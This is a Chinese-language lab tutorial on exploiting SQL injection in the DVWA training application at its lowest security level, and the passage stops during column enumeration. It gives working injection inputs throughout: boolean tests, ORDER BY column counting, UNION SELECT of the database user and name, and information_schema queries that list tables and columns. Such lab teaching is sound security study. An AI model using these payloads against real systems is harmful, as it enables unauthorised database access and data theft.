一、实战操作01

1、打开DVWA靶场

将安全等级调到最低-low

2、选择SQL注入

如何利用漏洞？首先查看开发人员是如何写的这SQL语句

代码解析：

SELECT first_name, last_name FROM users WHERE user_id = '$id'　

如何判断sq注入漏洞：
1）、测试一下，输入：1'and 1 = 1#

现在把1=1改成1=2再测试一下，输入：1' and 1 = 2#

SELECT first_name, last_name FROM users WHERE user_id = '1' and 1 = 2#

两次尝试 1=1 正常输出，1=2 错误输出，证明SQL语句生效，存在SQL注入漏洞

利用SQL漏洞，一般步骤如下：

2.1. 判断列/字段数 order by [列数] # ORDER BY是SQL 的排序子句

SELECT first_name, last_name FROM users WHERE user_id = '1' order by 1#
SELECT first_name, last_name FROM users WHERE user_id = '1' order by 2#
SELECT first_name, last_name FROM users WHERE user_id = '1' order by 3#

输入框输入：

1' order by 1#
1' order by 2#
1' order by 3#

用户输入： 1' order by 3# 报错，说明该数据库表有2列字段

2.2、通过union联合查询，查询对应的数据库名称

SELECT first_name, last_name FROM users WHERE user_id = '1'union select user(),database()#';

1'union select user(),database()# #获取数据库用户名和数据库名称

2.3、通过查询到的库名寻找表名

SELECT first_name, last_name FROM users WHERE user_id = '1' union select 1,table_name from information_schema.tables where table_schema='dvwa'#'

输入框输入：
1' union select 1,table_name from information_schema.tables where table_schema='dvwa'#'

2.4、通过表名查询对应的列名

SELECT first_name, last_name FROM users WHERE user_id = '1' and 1=2 union select 1,column_name from information_schema.columns where table_schema='dvwa' and table_name ='users' limit 0,1 #
SELECT first_name, last_name FROM users WHERE user_id = '1' and 1=2 union select 1,column_name from information_schema.columns where table_schema='dvwa' and table_name ='users' limit 1,2 #
SELECT first_name, last_name FROM users WHERE user_id = '1' and 1=2 union select 1,column_name from information_schema.columns where table_schema='dvwa' and table_name ='users' limit 2,3 #

输入框分别输入：

1' and 1=2 union select 1,column_name from information_schema.columns where table_schema='dvwa' and table_name ='users' limit 0,1 #